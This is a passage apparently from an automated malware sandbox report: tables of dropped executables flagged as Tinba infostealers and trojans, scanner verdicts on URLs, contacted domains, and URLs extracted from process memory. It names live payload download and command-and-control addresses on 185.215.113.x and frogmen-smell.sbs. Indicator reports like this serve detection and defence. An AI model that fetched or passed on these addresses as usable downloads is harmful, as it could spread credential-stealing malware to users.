C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mk[1].exe	8%	ReversingLabs	Win64.Malware.Giant
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	8%	ReversingLabs	Win64.Malware.Giant
C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://frogmen-smell.sbs/SW	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs:443/apiE	100%	Avira URL Cloud	malware
https://frogmen-smell.sb	0%	Avira URL Cloud	safe
https://edgeassetservice.azure	0%	Avira URL Cloud	safe
http://185.215.113.206K	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/mozglue.dll3k	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/lo	100%	Avira URL Cloud	malware
http://go.miO	0%	Avira URL Cloud	safe
http://185.215.113.206/EU	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/mG	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs:443/apitPK	100%	Avira URL Cloud	malware
http://185.215.113.206n	0%	Avira URL Cloud	safe
https://frogmen-smell.sbs/0	100%	Avira URL Cloud	malware
http://185.215.113.206lfons	0%	Avira URL Cloud	safe
https://frogmen-smell.sbs:443/apiMicrosoft	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/2	100%	Avira URL Cloud	malware
http://185.215.113.206/LMEM00	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dlla	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/freebl3.dll=j	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpY	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/_	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/a	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exeS	100%	Avira URL Cloud	phishing
http://185.215.113.43/Zu7JuNko/index.php)N	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/k	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/or	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpQ	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpB;	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/apiO	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/apiJ	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncodedj	100%	Avira URL Cloud	phishing
http://185.215.113.206/68b591d6548ec281/softokn3.dllp	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php;	100%	Avira URL Cloud	phishing
https://frogmen-smell.sbs/apiW1	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/G	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/D	100%	Avira URL Cloud	malware
https://frogmen-smell.sbs/apia	100%	Avira URL Cloud	malware
http://crl.micro(	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
frogmen-smell.sbs	172.67.174.133	true	false	high
plus.l.google.com	216.58.206.46	true	false	high
play.google.com	142.250.181.238	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.65.39.56	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.186.164	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.97	true	false	high
sni1gl.wpc.nucdn.net	152.199.21.175	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/	false	high
https://c.msn.com/c.gif?rnd=1731526789129&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=49639501e5034f4f90986f967aa67a67&activityId=49639501e5034f4f90986f967aa67a67&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=227081EBCC284A41B44350BACC660DC9&MUID=25B04BE6D989657B07C35ED0D82864B0	false	high
https://deff.nelreports.net/api/report?cat=msn	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731526792039&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://sb.scorecardresearch.com/b?rn=1731526789129&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=25B04BE6D989657B07C35ED0D82864B0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
185.215.113.206/c4becf79229cb002.php	false	high
https://sb.scorecardresearch.com/b2?rn=1731526789129&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=25B04BE6D989657B07C35ED0D82864B0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
https://play.google.com/log?format=json&hasfast=true	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false	high
https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.16/mine/random.exe	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731526914203&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://edgeassetservice.azure	000003.ldb.9.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dll3k	file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs:443/apiE	06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000016.00000003.3926461536.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/SW	06d4af6f50.exe, 0000001E.00000003.3660448469.0000000001822000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/ws	deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206K	deb333ea90.exe, 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogmen-smell.sb	06d4af6f50.exe, 0000001E.00000003.3635881339.000000000180B000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628606604.0000000001805000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628353430.0000000001804000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660393375.0000000001817000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	000003.ldb.9.dr	false		high
http://185.215.113.206/EU	deb333ea90.exe, 0000001B.00000002.3502627065.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000018.00000002.3439711369.00000287D1975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3414689340.00000287C30A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	000003.ldb.9.dr	false		high
http://go.miO	06d4af6f50.exe, 0000001E.00000002.3904549769.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogmen-smell.sbs/mG	06d4af6f50.exe, 0000001A.00000003.3537807652.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000018.00000002.3414689340.00000287C17C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/lo	06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206lfons	file.exe, 00000000.00000002.2672659024.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206n	file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2700275828.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000018.00000002.3414689340.00000287C292A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs:443/apitPK	06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3491944435.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3490849920.0000000005335000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/	deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	06d4af6f50.exe, 0000001A.00000003.3492751843.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3611368078.0000000005FF5000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3801157165.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/0	06d4af6f50.exe, 0000001A.00000003.3514947387.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515654097.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/2	06d4af6f50.exe, 00000021.00000003.3870010104.00000000019BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/LMEM00	deb333ea90.exe, 0000001B.00000002.3502627065.00000000013E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs:443/apiMicrosoft	06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/68b591d6548ec281/msvcp140.dlla	file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	06d4af6f50.exe, 0000001E.00000003.3698858088.00000000017F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16:80/off/def.exe	06d4af6f50.exe, 0000001A.00000003.3773018531.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3797225611.00000000006DC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dll=j	file.exe, 00000000.00000002.2675026709.0000000001597000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	file.exe, 00000000.00000003.2566084015.0000000023F89000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://msn.comXIDv10	06d4af6f50.exe, 0000001A.00000003.3473228881.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3474071245.000000000533F000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473546102.000000000535C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473512863.000000000533C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593468662.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593283691.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593117408.0000000005F72000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3784152546.0000000005E14000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3782743290.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3783930962.0000000005E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	000003.ldb.9.dr	false		high
http://185.215.113.16/off/def.exe	06d4af6f50.exe, 0000001A.00000002.3795878434.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3719067775.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3794187352.00000000003BA000.00000004.00000010.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3897005303.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804578427.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3804193606.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000002.3895987276.000000000153B000.00000004.00000010.00020000.00000000.sdmp	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNs	000003.ldb.9.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpY	deb333ea90.exe, 0000001B.00000002.3502627065.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/_	06d4af6f50.exe, 0000001A.00000003.3537807652.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://frogmen-smell.sbs/a	06d4af6f50.exe, 0000001A.00000003.3474452346.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpd	file.exe, 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/5	deb333ea90.exe, 00000020.00000002.3673961826.000000000103A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogmen-smell.sbs/k	06d4af6f50.exe, 0000001E.00000003.3676183261.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
